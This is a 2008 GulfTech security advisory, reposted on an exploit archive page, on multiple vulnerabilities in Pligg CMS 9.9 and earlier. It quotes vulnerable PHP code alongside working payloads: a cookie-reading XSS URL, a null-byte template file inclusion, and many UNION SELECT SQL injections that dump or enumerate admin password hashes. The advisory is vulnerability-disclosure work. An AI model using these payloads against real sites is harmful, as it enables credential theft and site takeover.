exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

pligg99-sqlxss.txt

pligg99-sqlxss.txt
Posted Jul 31, 2008
Authored by James Bercegay | Site gulftech.org

Pligg versions 9.9 and below suffer from cross site scripting, arbitrary file access, and SQL injection vulnerabilities.

tags | exploit, arbitrary, vulnerability, xss, sql injection
SHA-256 | 8951af9cbb0e1cb8b302cc5d8b9a2d0f3d0893fb2ebe73942ce1562bdf645737

pligg99-sqlxss.txt

Change Mirror Download
##########################################################
# GulfTech Security Research July 30, 2008
##########################################################
# Vendor : Pligg LLC
# URL : http://www.pligg.com/
# Version : Pligg <= 9.9
# Risk : Multiple Vulnerabilities
##########################################################


Description:
Pligg is a popular open source, full featured, content management
system written in php. There are a number of vulnerabilities
within Pligg that allow for remote file enumeration, file inclusion,
cross site scripting, and sql injection. When combined these issues
allow for remote code execution on the affected installation
via arbitrary php code placed within template files once admin
credentials are gained via SQL Injection.



Cross Site Scripting:
There are Cross Site Scripting issues in Pligg that allow for
theft of client side credentials such as cookies. An example
can be found in user.php. If the "view" parameter is set to
"search" then the "keyword" parameter can be influenced. This
is a result of un sanitized GPC variables being issued directly
to smarty via the assign function.

/user.php?view=search&keyword=<script>alert(document.cookie);</script>

The above example link would display the end users cookie to
them. Of course this can also be used to steal the cookie data
as mentioned earlier in this advisory.



Arbitrary File Access:
A number of file access issues exist in Pligg. They range from
the not so severe (such as arbitrary file enumeration) to the
much more severe (arbitrary file inclusion). In regards to the
arbitrary file enumeration a good example of it can be found in
trackback.php @ line 76

$contents=@file_get_contents($tb_url);
if(!$contents)
trackback_response(1,
$main_smarty->get_config_vars('PLIGG_Visual_Trackback_BadURL'));

The $tb_url variable gets it's value directly from a post variable
as seen @ line 36, so, we can see how this can be easily used to
enumerate the existence of files on the web server both inside and
outside of the web accessible directories. If the file exists we will
get the "PLIGG_Visual_Trackback_BadURL" error. In addition to this
issue, an attacker may also include arbitrary files via a malformed
template request. Both template and language data within Pligg are
accepted via cookie input and are used in file handling operations
with no sanitation. The vulnerable code in question can be found in
config.php @ lines 65-68.

/settemplate.php?template=../LICENSE.txt%00

An easy way to see this issue in action is to set the malformed
"template" value via Pligg's settemplate.php script as seen above.
The above example will successfully include the LICENSE.txt file
that ships with the application by default.



SQL Injection:
There are a substantial number of SQL Injection issues within Pligg
that allow for an attacker to read any data from the underlying
database including user credentials. The first file we are going to
look at is vote.php

$link = new Link;
$link->id=$_POST['id'];
$link->read_basic();

The above code can be found @ lines 19-21 and shows Pligg setting the
internal class variable "id" with data from the $_POST super global.
Now let's have a look at the read_basic() function within the Link
class to see what exactly is being done with "id"


// check to see if the link is cached
// if it is, use it
// if not, get from mysql and save to cache

if (isset($cached_links[$id]) && $usecache == TRUE) {
$link = $cached_links[$id];
} else {
$link = $db->get_row("SELECT " . table_links . ".* FROM " .
table_links . " WHERE link_id = $id");
$cached_links[$id] = $link;
}


As you can see in the above code taken from /libs/link.php @ lines
200-209 the "id" variable is never sanitized before being used in a
query. The result is a highly exploitable SQL Injection vulnerability.

md5=d41d8cd98f00b204e9800998ecf8427e&id=-99 UNION SELECT 1,2,3,null,5,
6,concat(user_login,char(58),user_pass),8,9 FROM pligg_users -- /*

By sending a post request to vote.php with the above data an attacker
can successfully expose user credentials. Still, there are more SQL
Injection issues in Pligg, and next we will have a look at trackback.php

$trackres = new Trackback;
$trackres->link=$tb_id;
$trackres->type='in';
$trackres->url = $tb_url;
$dupe = $trackres->read();

The above code comes from trackback.php @ lines 68-72, and like the
issue we previously discussed in regards to vote.php also sends
unsanitized gpc data to an internal class variable (in this case
$trackres->link) where it is used in an SQL Query without ever being
sanitized.

/trackback.php?id=007 UNION SELECT 1,2,3,4,5,6,7,8,9,10 FROM pligg_users
WHERE user_id=1 AND MID(user_pass,1,1)=concat(char(97)) -- /*

A request like the one above made with the post method to trackback.php
and having the post contents of "url=1&title=1&blog_name=1" can be used
to successfully enumerate database contents. In the example above Pligg
would return a "We already have a ping from that URL for this post."
error if the first character of the first user's password is "a". Next
let's have a look at submit.php @ lines 320-321 and you will see another
SQL Injection issue very similar to these first two that I have discussed.
Another SQL Injection issue can be found in story.php @ lines 45 where
the "requestTitle" variable is used in a query with no sanitation.
Another SQL Injection issue can be found in recommend.php @ lines 19-25.
The SQL Injection issues in recommend.php are possible through both the
"requestID" and the "requestTitle" variables. Another SQL Injection issue
can be found in cloud.php @ lines 35-36 via the categoryID parameter.
Another SQL Injection issue can be found within out.php and is not much
different from the previously discussed SQL Injection issues in Pligg.

/out.php?title=-99%27 UNION SELECT 1 FROM pligg_users WHERE user_id=1 AND
MID(user_pass,1,1)=concat(char(97))/*

The above url will allow an attacker to enumerate database data as
discussed earlier, and eventually gain admin credentials. Due to the large
number of SQL Injection issues in Pligg I will identify the remaining
issues with some simple examples of exploitation.

---[ login.php ]------------------------------------------------
/* Post Request */
processlogin=3&username=-99' UNION SELECT
1,2,3,4,5,6,null,8,9,10,11,12,13,14,
15,16,17,18,19,20,21,22,23,24,25,26 FROM pligg_users WHERE user_id=1/*

/* Get Request */
/login.php?processlogin=4&username=-99' UNION SELECT 1 FROM pligg_users
WHERE user_id=1/*&confirmationcode=1

---[ cvote.php ]------------------------------------------------
/* Post Request */
id=-99 UNION SELECT 1,null,3,4,5,6,7,8,9 FROM pligg_users/*
&md5=d41d8cd98f00b204e9800998ecf8427e

---[ edit.php ]-------------------------------------------------
/* Get Request */
/edit.php?id=1&commentid=-99 UNION SELECT 1 FROM pligg_users WHERE
user_id=1 AND MID(user_pass,1,1)=concat(char(49))/*



Solution:
The Pligg developers are aware of the issues mentioned in this advisory
and an updated version of Pligg should be available from their website.
All users are encouraged to upgrade their Pligg installations as soon
as possible.



Credits:
James Bercegay of the GulfTech Security Research Team



Related Info:
The original advisory can be found at the following location
http://www.gulftech.org/?node=research&article_id=00120-07312008
Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close